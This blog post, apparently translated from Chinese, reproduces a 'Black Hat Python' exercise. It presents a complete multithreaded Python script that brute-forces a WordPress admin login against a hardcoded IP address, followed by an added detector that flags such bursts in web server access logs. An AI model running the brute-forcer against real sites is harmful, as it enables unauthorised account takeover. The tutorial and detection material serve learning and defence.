Getting Started with Python Penetration Testing: WordPress Login

Author: ailx10

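I recently received a network security book, Black Hat Python (《python黑帽子》), as a gift from the Publishing House of Electronics Industry. The book contains 24 experiments in total, and today I am reproducing experiment 14 (password guessing). My test environment is an MBP, a colleague's WordPress site, and a conda development environment. To be fair, weak passwords are fragile, but complex passwords simply cannot be guessed. Having to analyze the site's POST request and response is worthwhile, but sitting there waiting while burning CPU and network is not advisable~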

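1. Review the source code of the WordPress site's login page

  • First send a GET request and accept all the cookies that are returned
  • Parse the form elements in the returned page (look at the input tags: log is the username, pwd is the password, wp-submit is the submit button, testcookie is the hidden cookie)
  • Modify the form elements of the returned page (set the username to "admin", set the password to each entry of the dictionary in turn, leave everything else unchanged)
  • Send the POST request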

2. Download the dictionary file

3. Run the script on the MBP

Reference code:

# -*- coding: utf-8 -*-
# @Time    : 2022/6/13 9:47 PM
# @Author  : ailx10
# @File    : wordpress_killer.py

from io import BytesIO
from lxml import etree
from queue import Empty, Queue
import requests
import threading
import time

# SUCCESS = "Welcome to WordPress!"
SUCCESS = "歡迎"  # marker string expected in the page returned after a successful login
TARGET = "http://124.223.4.212/wp-login.php"
WORDLIST = "/Users/ailx10/py3hack/chapter5/cain.txt"

def get_words():
    # Load the dictionary file into a thread-safe queue, one candidate per entry
    with open(WORDLIST) as f:
        raw_words = f.read()
        words = Queue()
        for word in raw_words.split():
            words.put(word)
    return words

def get_params(content):
    # Collect every named <input> of the login form, hidden fields included
    params = dict()
    parser = etree.HTMLParser()
    tree = etree.parse(BytesIO(content),parser=parser)
    for elem in tree.findall("//input"):
        name = elem.get("name")
        if name is not None:
            params[name] = elem.get("value",None)
    return params

class Bruter:
    def __init__(self,username,url):
        self.username = username
        self.url = url
        self.found = False
        print(f"\nBrute Force Attack beginning on {url}.\n")
        print("Finished the setup where username = %s\n"%username)

    def run_bruteforce(self,passwords):
        # Ten worker threads share the same password queue
        for _ in range(10):
            t = threading.Thread(target=self.web_bruter,args=(passwords,))
            t.start()

    def web_bruter(self,passwords):
        # The GET request receives the cookies and the form fields
        session = requests.Session()
        resp0 = session.get(self.url)
        params = get_params(resp0.content)
        params["log"] = self.username

        while not passwords.empty() and not self.found:
            time.sleep(1)
            try:
                # get_nowait() avoids blocking forever when another thread
                # has already taken the last word from the queue
                passwd = passwords.get_nowait()
            except Empty:
                break
            print(f"Trying username/password {self.username}/{passwd:<10}")
            params["pwd"] = passwd

            resp1 = session.post(self.url,data=params)
            if SUCCESS in resp1.content.decode():
                self.found = True
                print("\nBruteforcing successful.")
                print("Username is %s"%self.username)
                print("Password is %s\n"%passwd)
                print("done.")

if __name__ == "__main__":
    words = get_words()
    b = Bruter("admin",TARGET)
    b.run_bruteforce(words)
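
Seen from the defending side, the script above leaves a recognizable pattern in the web server's access log: a burst of POST requests to wp-login.php from one address, answered with 200 while WordPress re-renders the form after each failed login and with a 302 redirect once a guess succeeds. The following is an added example, not part of the original post, that flags that pattern. It assumes Combined Log Format and default WordPress status codes; the log lines, IP addresses, threshold and window are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def detect_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed wp-login.php POSTs inside the window."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failed POSTs
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "200":       # login form re-rendered: failed attempt
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(
                    ip, {"max_failed_in_window": 0, "success_after_burst": False})
                f["max_failed_in_window"] = max(f["max_failed_in_window"], len(q))
        elif m["status"] == "302" and ip in findings:
            # redirect after a flagged burst: a guess probably succeeded
            findings[ip]["success_after_burst"] = True
    return findings

def _line(ip, sec, method, status):
    return (f'{ip} - - [13/Jun/2022:22:00:{sec:02d} +0800] '
            f'"{method} /wp-login.php HTTP/1.1" {status} 512 "-" "-"')

# Constructed log (documentation-range addresses): eight failed guesses and a
# success from one address, plus an ordinary user who mistypes once, then logs in.
SAMPLE_LOG = (
    [_line("203.0.113.7", s, "POST", 200) for s in range(8)]
    + [_line("203.0.113.7", 8, "POST", 302)]
    + [_line("198.51.100.20", 10, "GET", 200),
       _line("198.51.100.20", 15, "POST", 200),
       _line("198.51.100.20", 30, "POST", 302)]
)

if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))
```

A finding with success_after_burst set is the one to act on first: it means the account's password should be treated as compromised, not just that guessing was attempted.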

Published 2022-06-13 22:23